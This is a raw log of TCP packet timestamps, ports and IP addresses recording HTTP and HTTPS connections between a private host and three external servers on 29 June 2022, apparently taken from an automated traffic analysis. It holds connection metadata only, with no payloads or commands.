Jun 29, 2022 23:11:27.643182993 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:27.643248081 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:27.774116993 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:27.901922941 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:28.712090015 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:28.736159086 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:28.736212015 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:28.760096073 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:28.901942015 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:28.902081966 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:28.926142931 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:28.927237034 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:29.113095045 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:29.292588949 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:29.965084076 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:29.989092112 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:29.989213943 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:30.144594908 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:30.168188095 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:30.168334961 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:30.192085028 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:30.292721033 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:30.509099007 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:30.535283089 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:30.535438061 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:31.220124006 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:31.245544910 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:31.245666981 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:31.430033922 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:31.453149080 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:31.456326962 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:31.579197884 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:31.719525099 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:31.721189976 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:31.744235039 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:31.744436026 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:31.768673897 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:31.902241945 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:32.486659050 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:32.512175083 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:32.512267113 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:32.718563080 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:32.742670059 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:32.743439913 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:32.994309902 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:33.010677099 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:33.010768890 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:33.034533978 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:33.058257103 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:33.059189081 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:33.192821026 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:33.292924881 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:33.766779900 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:33.790875912 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:33.790956020 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:34.021178007 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:34.047096014 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:34.047189951 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:34.380549908 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:34.400654078 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:34.400743008 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:34.475224972 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:34.499182940 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:34.499322891 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:34.626262903 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:34.793076992 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:35.126892090 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:35.148303032 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:35.148426056 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:35.172199965 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:35.261593103 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:35.427207947 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:35.451219082 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:35.451375008 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:35.784147024 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:35.805234909 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:35.807426929 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:35.890211105 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:35.909909010 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:35.912728071 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:36.160815954 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:36.240756989 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:36.496778011 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:36.519622087 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:36.519743919 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:36.696434975 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:36.723825932 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:36.723915100 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:36.849230051 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:36.874335051 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:36.874463081 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:37.138380051 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:37.158121109 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:37.158179998 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:37.285254002 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:37.309192896 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:37.309271097 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:37.550180912 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:37.605804920 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:37.848297119 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:37.871190071 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:37.871253967 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:38.016729116 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:38.038688898 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:38.038768053 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:38.062256098 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:38.199568987 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:38.239506960 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:38.263130903 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:38.263206959 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:38.509016991 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:38.532948017 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:38.533154964 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:38.642277956 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:38.666203022 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:38.666385889 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:38.812289000 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:38.871526957 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:38.871653080 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:38.895266056 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:38.924253941 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:38.924335957 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:38.948393106 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:38.972389936 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:38.972466946 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:38.997351885 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:39.021445036 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:39.024571896 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:39.044097900 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:39.075330019 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:39.079261065 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:39.100646019 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:39.242136002 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:39.242259026 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:39.267358065 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:39.311292887 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:39.311369896 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:39.335884094 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:39.359693050 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:39.359992027 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:39.383341074 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:39.406188965 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:39.406265974 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:39.432629108 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:39.455158949 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:39.455249071 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:39.483079910 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:39.504348040 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:39.504430056 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:39.536040068 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:39.560945034 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:39.561089039 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:39.800060034 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:39.824116945 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:39.824181080 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:39.847021103 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:39.872067928 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:39.872195959 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:39.897049904 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:39.918534040 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:39.918623924 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:39.944072008 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:39.967077017 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:39.967190981 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:39.991211891 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:40.015515089 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:40.015614033 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:40.048114061 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:40.071187019 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:40.071289062 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:40.095282078 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:40.133080959 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:40.133217096 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:40.154040098 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:40.293565989 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:40.616682053 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:40.636151075 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:40.636248112 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:40.663515091 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:40.687056065 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:40.687148094 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:40.710098982 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:40.737106085 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:40.737225056 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:40.761117935 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:40.780126095 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:40.780179977 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:40.810111046 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:40.835944891 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:40.836046934 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:40.869563103 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:40.892129898 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:40.892239094 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:40.925219059 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:40.948087931 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:40.948256969 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:40.972095966 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:41.106095076 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:41.209216118 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:41.293597937 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:41.829272032 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:41.853306055 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:41.879298925 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:41.889269114 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:41.915472031 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:41.915546894 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:41.940284014 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:41.964186907 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:41.964277029 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:41.993622065 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:42.015285969 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:42.015472889 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:42.044306040 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:42.068312883 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:42.068392038 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:42.097243071 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:42.121292114 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:42.121409893 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:42.154242039 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:42.178261995 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:42.178345919 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:42.405818939 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:42.428172112 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:42.431854010 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:42.756565094 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:42.903384924 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:43.517666101 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:43.543091059 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:43.543183088 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:43.567212105 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:43.589288950 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:43.589385986 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:43.617342949 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:43.638983965 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:43.639077902 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:43.675811052 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:43.700655937 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:43.700742006 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:43.726174116 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:43.752319098 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:43.752386093 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:43.780605078 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:43.803478956 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:43.803617954 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:43.828413010 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:43.852720976 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:43.852871895 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:44.068456888 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:44.092102051 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:44.092170000 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:44.518214941 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:44.541173935 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:44.541253090 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:45.192250013 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:45.216639042 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:45.216768026 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:45.242497921 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:45.266746998 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:45.266935110 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:45.288491011 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:45.297492027 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:45.297576904 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:45.297638893 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:45.986048937 CEST	49765	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:11:45.997183084 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:46.051625013 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:46.111584902 CEST	80	49756	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:46.113315105 CEST	49756	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:46.295856953 CEST	80	49765	211.53.230.67	192.168.2.3
Jun 29, 2022 23:11:46.301681042 CEST	49765	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:11:46.301862955 CEST	49765	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:11:46.305546999 CEST	49765	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:11:46.617656946 CEST	80	49765	211.53.230.67	192.168.2.3
Jun 29, 2022 23:11:47.345630884 CEST	80	49765	211.53.230.67	192.168.2.3
Jun 29, 2022 23:11:47.345683098 CEST	80	49765	211.53.230.67	192.168.2.3
Jun 29, 2022 23:11:47.346002102 CEST	49765	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:11:47.346847057 CEST	49765	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:11:47.654405117 CEST	80	49765	211.53.230.67	192.168.2.3
Jun 29, 2022 23:11:47.936197996 CEST	49766	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:48.128701925 CEST	80	49766	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:48.128829956 CEST	49766	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:48.128952980 CEST	49766	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:48.128974915 CEST	49766	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:48.809906006 CEST	49766	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:49.053571939 CEST	80	49766	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:49.707638979 CEST	80	49766	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:49.960675955 CEST	80	49766	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:49.960839987 CEST	49766	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:50.788711071 CEST	80	49766	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:50.788893938 CEST	49766	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:50.789130926 CEST	49766	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:50.816397905 CEST	49767	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:11:51.126734018 CEST	80	49767	211.53.230.67	192.168.2.3
Jun 29, 2022 23:11:51.126990080 CEST	49767	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:11:51.127032042 CEST	49767	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:11:51.127039909 CEST	49767	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:11:51.439810038 CEST	80	49767	211.53.230.67	192.168.2.3
Jun 29, 2022 23:11:51.457608938 CEST	80	49766	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:51.457680941 CEST	49766	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:51.498677969 CEST	49766	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:51.878690004 CEST	80	49766	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:51.905477047 CEST	80	49767	211.53.230.67	192.168.2.3
Jun 29, 2022 23:11:51.905841112 CEST	80	49767	211.53.230.67	192.168.2.3
Jun 29, 2022 23:11:51.906147003 CEST	49767	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:11:51.908965111 CEST	49767	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:11:51.933310986 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:51.933351994 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:51.933408976 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:51.934516907 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:51.934537888 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.169672012 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.173247099 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.174860001 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.174880981 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.175307989 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.196204901 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.219532013 CEST	80	49767	211.53.230.67	192.168.2.3
Jun 29, 2022 23:11:52.236505985 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.398837090 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.500750065 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.500775099 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.502585888 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.502604008 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.502629995 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.502639055 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.502645969 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.502693892 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.502706051 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.502759933 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.502790928 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.503387928 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.503407001 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.503433943 CEST	443	49768	206.221.182.74	192.168.2.3
